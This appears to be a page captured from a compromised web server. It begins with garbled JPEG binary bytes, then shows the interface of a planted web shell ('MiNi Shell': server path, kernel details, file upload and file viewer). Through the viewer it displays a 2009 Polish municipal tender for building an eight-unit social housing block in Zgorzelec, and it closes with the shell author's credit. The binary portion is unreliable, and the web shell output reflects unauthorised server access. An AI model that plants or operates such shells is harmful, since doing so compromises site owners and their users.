JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090916/157795-N-2009.html

<p class="kh_header"><b>Zgorzelec: Budowa mieszkań socjalnych</b><br>
<b>Numer ogłoszenia: 157795 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa mieszkań socjalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie powyżej 14 000 euro a poniżej kwot określonych w art.11 ust.8 ustawy z dnia 29 .01. 2004r. Prawo Zamówień Publicznych
1. Przedmiotem zamówienia jest wykonanie budynku mieszkalnego - socjalnego ośmiorodzinnego wraz z infrastrukturą towarzyszącą. Budynek zostanie zlokalizowany pomiędzy dwoma istniejącymi budynkami socjalnymi w odpowiednich odległościach na wydzielonej działce. Budynek zawierać będzie osiem segmentów, z których każdy tworzy niezależne mieszkanie składające się z wiatrołapu, korytarza, pokoju, kotłowni, łazienki wraz z WC, pokoju i aneksu kuchennego. Przy każdym mieszkaniu zaprojektowano komórkę gospodarczą. Obiekt będzie wolnostojącym, parterowym budynkiem składającym się z ośmiu jednakowych segmentów. Ze względu na występujące różnice terenu zaprojektowano rozdzielenie budynku na dwa obiekty o różnych poziomach posadowienia oraz wykonanie skarp nasypowych. Konstrukcja budynku jest tradycyjna, budynek ma kształt prostokąta. Dach dwuspadowy, symetryczny o pochyleniu połaci dachowej 10 stopni, kryty papą termozgrzewalną. Ściany murowane z pustaków gazobetonowych grubości 24 cm, ocieplonych styropianem grubości 1 cm. Wysokość pomieszczeń wynosi 2,50m.
Parametry budynku:
a)  Poziom podłogi na parterze
            Obiekt I 0,00=184,62 .m.n.p.pm
            Obiekt II 0,00=185,02 m.n.p.m.
b)  Poziom przed wejściem do budynku
            Obiekt I -0,32=184,30m.n.p.m. 
                 -0,47=184,55m.n.p.m. 
            Obiekt  II -0,32=184,70 m.n.p.m.
                   -0,47=184,55m.n.p.m.
c)  Długość budynku - 42,16m,
d)  Szerokość budynku - 13,74m,
e)  Wysokość budynku od kalenicy - 4,31m,
f)  Powierzchnia całkowita - 408,40m2,
g)  Powierzchnia użytkowa - 72,40m2,
h)  Kubatura - 985,00m3,
i)  Powierzchnia zabudowy - 486,35m2,
j)  Powierzchnia tarasów, schodów zewnętrznych - 98,10m2 
Pozostałe parametry:
a)  Powierzchnia chodników - 27,12 m2,
b)  Powierzchnia dróg wewnętrznych oraz miejsc postojowych - 320,00m2,
c)  Powierzchnia boksu, placyku gospodarczego - 16,60 m2,
d)  Powierzchnia terenów zielonych - 869,83 m2,
Fundamenty
Budynek posadowiony będzie na ławach żelbetowych 60 x 30, które należy wykonać z betonu B25. Poziom posadowienia 100,00 cm poniżej poziomu terenu. Ławy zbrojone będą stalą 34GS 4 fi 12, strzemiona ze stali St0S fi 6 co 20cm. Ściany fundamentów wykonane będą z bloczków betonowych M6. 
Ściany
Ściany zewnętrzne dwuwarstwowe wykonane będą z pustaków gazobetonowych grubości 24 cm plus styropian grubości 12 cm (nie objęty Etapem I). Ściany fundamentowe z bloczków betonowych grubości 24 cm plus styropian grubości 8 cm. Ściany wewnętrzne z pustaków gazobetonowych grubości 12 cm.
Schody i tarasy
Schody zewnętrzne zaprojektowano jako żelbetowe. Tarasy zaprojektowano z kostki betonowej szarej ułożonej na podsypce piaskowej. 
Stropy
Stropy żelbetowe Filigran o wysokości 18 cm oparte będą na ścianach nośnych w wieńcach żelbetowych. 
Konstrukcja dachu i pokrycie
Dach dwuspadowy o nachyleniu połaci 10 st. Więźba dachowa składa się z krokwi 8x16cm, obustronnych kleszczy 2x6x14cm, nakładek 2x6x14cm, słupów 12x12cm i 16x16cm oraz murłat 12x12cm. Dach zostanie pokryty papą termozgrzewalną podkładową i wierzchniego krycia na pełnym deskowaniu.  
Nadproża 
Nadproża okienne i drzwiowe wykonane będą jako żelbetowe prefabrykowane z belek typu L-19. Minimalna długość oparcia belki nadproża - 10 cm. 
Wieńce stropowe
Na zwieńczeniach ścian należy wykonać wieńce żelbetowe o wymiarach 24x24 cm, zbrojone stalą 34GS 4 fi 12, strzemiona St0S fi 6 co 30 cm.
Izolacje przeciwwilgociowe
Należy wykonać izolację poziomą przeciwwilgociową fundamentów 2 x papa asfaltowa na lepiku i izolację pionową Abizol R+P. Izolacje należy wykonać na całym obiekcie.
Do budynku w Etapie I zostaną doprowadzone przyłącza wodociągowe oraz kanalizacji sanitarnej. 
Izolacje cieplne
Izolację cieplną ścian stanowi warstwa styropianu grubości 12 cm wykonana w systemie ocieplenia budynku technologią lekką - mokrą. Izolację cieplną podłogi stanowią płyty styropianowe ułożone na sucho o grubości 10 cm. Izolację cieplną stropu stanowi wełna mineralna półtwarda o grubości 16 cm. 
Posadzki
W pomieszczeniach zaprojektowano posadzki z płytek ceramicznych o wymiarach 30x30 cm, kładzionych metodą zwykłą na klej, z paneli podłogowych oraz posadzkę betonową. 
Okładziny wewnętrzne
Okładziny ścian wewnętrznych stanowią tynki cementowo - wapienne. W pomieszczeniach higieniczno - sanitarnych należy do wysokości 2 m wykonać okładziny z płytek ceramicznych o wymiarach 15x15 cm na zaprawie klejowej, ułożone metodą zwykła. Okładziny stropu stanową tynki gipsowe. 
Tynki zewnętrzne
Okładziny ścian zewnętrznych zaprojektowano w formie tynków szlachetnych akrylowych wykonanych w technologii docieplenia budynku BSO Bezspoinowy system ocieplenia ścian zewnętrznych. 
Powłoki malarskie
Ściany i sufity w pomieszczeniach należy malować dwukrotnie farbami emulsyjnymi, akrylowymi w kolorach jasnych pastelowych.
Obróbki blacharskie 
Obróbki blacharskie, rynny fi 12 oraz rury spustowe fi 10 należy wykonać z blachy ocynkowanej o grubości 0,6 mm.
Stolarka okienna i drzwiowa
Okna i drzwi powinny być wykonane na zamówienie zgodnie z zestawieniem stolarki. Stolarka z pcv i drewniana.
Wentylacja
Wentylację zaprojektowano jako grawitacyjną oraz mechaniczną. 
Instalacje
W budynku zaprojektowano wykonanie następujących instalacji:
- wodociągowa i kanalizacji sanitarnej,
- centralnego ogrzewania,
- elektryczną.
Przyłącza
Do budynku zostaną doprowadzone następujące przyłącza:
- wodociągowe,
- kanalizacyjne,
- energetyczne,
Teren wokół budynku
Teren należy ukształtować, obsiać trawą i obsadzić zielenią. Wykonać chodniki z kostki betonowej szarej na podsypce piaskowej. 
2. Zamawiający nie może opisywać przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń. Dlatego wszędzie, gdzie z opisu przedmiotu zamówienia wynika wskazanie znaków towarowych, patentów lub pochodzenia, wykonawca przyjmie, że wskazaniu takiemu towarzyszą wyrazy lub równoważny i wykonawca może zaoferować przedmiot równoważny.
UWAGA: Wszystkie wskazane z nazwy materiały i przyjęte technologie użyte w dokumentacji technicznej należy rozumieć jako określenie wymaganych minimalnych parametrów technicznych lub standardów jakościowych. Oznacza to, że Zamawiający dopuszcza składanie ofert równoważnych dla nazwanych materiałów oraz proponowanej technologii wykonania, wymienionych w powołanej dokumentacji technicznej z zachowaniem jej wymogów w zakresie jakości.
Wykonawca w świetle powyższych zapisów może zaoferować dowolne urządzenia i technologie, pod warunkiem zgodności proponowanego rozwiązania z dokumentacją projektową..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.10.00-9, 45.11.12.00-0, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca  wniesie wadium w wysokości: 
17.925,- PLN (słownie: siedemnaście tysięcy dziewięćset dwadzieścia pięć złotych 00/100)
2. Wadium musi obejmować okres związania ofertą.
Uwaga! Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania Zamawiającego i Wykonawcy  dot. w/w ustaleń będą podlegały odpowiednio nowym terminom.
3. Termin wniesienia wadium upływa przed terminem składania ofert
4. Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na 
przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu
związania ofertą  zostanie przez Zamawiającego wykluczony z ubiegania się o 
udzielenie zamówienia publicznego. 
5. W zależności od woli wykonawcy wadium może być wnoszone w formach:
a/ pieniądzu,
b/ poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c/ gwarancjach bankowych,
d/ gwarancjach ubezpieczeniowych,
e/ poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2
ustawy z dnia 09.11.2000 r. o utworzeniu PARP (Dz.U. z 2007r. Nr 42, poz. 275).
6. W przypadku wniesienia wadium w formach wymienionych w pkt.5 ppkt b, c, d i e  z treści  dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy 
gwarancyjnej  nastąpi także w przypadku określonym w pkt.14.
Zabronionym jest umieszczenie w treści tego dokumentu jakiejkolwiek klauzuli lub 
zapisu stanowiącego, że wypłata wadium w okolicznościach określonych w pkt.14 
będzie uzależniona od dodatkowych okoliczności dowodowych, które spełnić ma 
Beneficjent. Gwarancja ma mieć charakter bezwarunkowy i być płatna na pierwsze wezwanie.
7. Warunkiem uznania wniesienia wadium w formach wymienionych w pkt. 5 ppkt 
b, c, d  i e  będzie załączony do oferty dokument potwierdzający wniesienie wadium do Zamawiającego.
8. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
zamawiającego Nr 35124012971111000025654013 w banku PEKAO S.A. I O/Zgorzele 
Na przelewie należy  umieścić informację :  Wadium do postępowania przetargowego: Budowa mieszkań socjalnych
Potwierdzeniem tej formy wniesienia wadium będzie oryginał dowodu wpłaty lub potwierdzona za zgodność z oryginałem jego kopia załączona  do oferty.
9. Wadium wniesione przez jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, uważa się za wniesione prawidłowo pod warunkiem, że wniesienie jego nastąpiło po związaniu się przez Wykonawców umową np. konsorcjum.
10. Wadium zostanie zwrócone jeżeli:
- upłynął termin związania ofertą,
- zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
należytego wykonania tej umowy,
-  zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały
ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
11. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
a/ który wycofał ofertę przed upływem terminu składania ofert,
b/ który został wykluczony z postępowania,
c/ którego oferta została odrzucona, chyba ,że wystąpią okoliczności określone w pkt.14 
12. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym 
zwrócono wadium na podstawie art. 46 ust.2 pkt. 2 i 3 ustawy Prawo zamówień 
publicznych,   jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono 
czynność wykluczenia  wykonawcy lub odrzucenia oferty. Wykonawcy wniosą wadium w terminie określonym przez Zamawiającego.
13. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 w/w ustawy, lub pełnomocnictw. 
15. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
oferta została wybrana:
a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie, 
b/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
przyczyn   leżących  po stronie wykonawcy.
c/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
16. Wadium wybranego wykonawcy zostanie zwrócone niezwłocznie po zawarciu przez niego umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie Zamówienia mogą się ubiegać Wykonawcy, którzy:
1.  Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
3.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia 
4.  Nie podlegają wykluczeniu z postępowania o zamówienie publiczne zgodnie z art.24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych
5.  Złożą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia
6.  Zamawiający informuje, ze w przypadku Wykonawców wspólnie ubiegających sie o udzielenie  zamówienia, muszą zostać spełnione warunki, odpowiednio:
a)  warunki określone w art. 22 ust. 1 pkt. 1 i pkt. 4 ustawy PZP musza zostać spełnione przez każdego z wykonawców wspólnie ubiegających sie o zamówienie,
b) warunki określone w art. 22 ust. 1 pkt. 2 i 3 mogą być spełnione przez każdego  z   wykonawców, kilku lub łącznie przez wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,	
c) przy ocenie spełniania warunków udziału w postępowaniu, o których mowa w ppkt.  b  wielkości stanowiące o spełnianiu warunków będą zsumowane..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na potwierdzenie spełniania warunku posiadania uprawnienia do wykonywania     określonej  działalności lub czynności,  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Zamawiający żąda załączenia do oferty :
a) Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
b) Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy PZP, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert,
c) Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9 ustawy PZP, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert.
Zgodnie z zapisami § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( Dz.U. Nr 87, poz. 605 z późn zmianami), jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.2.1.a) i c) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Zgodnie z zapisami § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( Dz.U. Nr 87, poz. 605 z późn zmianami), jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.2.1.b) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo  zamieszkania osoby której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo Zamówień Publicznych.
(dokument lub dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu  o udzielenie zamówienia albo składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o  udzielenie zamówienia albo składania ofert, 
2. Na potwierdzenie spełniania warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  Zamawiający żąda załączenia do oferty:
a) Wykazu wykonanych robot budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencji).
Zamawiający wymaga aby wykaz zawierał:
- minimum dwie roboty budowlane polegające na budowie budynków mieszkalnych zamieszkania zbiorowego bądź jednorodzinnych wraz z przyłączami wodnym i kanalizacyjnym, o wartości nie mniejszej niż  1.000.000,00zł brutto łącznie,
b) Wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także  zakresu  wykonywanych przez nich  czynności,  lub załączenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania w/w zamówienia wraz z załączeniem dokumentów potwierdzających kwalifikacje osób lub podmiotów ujętych w wykazie.
Za wystarczające Zamawiający uzna dysponowanie minimum 1 osobą posiadającą uprawnienia do   pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w zakresie konstrukcyjno-budowlanym. Osoba wymieniona powyżej winna legitymować się dokumentami potwierdzającymi jej przynależność do Okręgowej Izby Inżynierów Budownictwa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec 
ul. Domańskiego 7 , 59-900 Zgorzelec, Wydział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 13:00, miejsce: 59-900 Zgorzelec, ul. Domańskiego 7,  Punkt Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com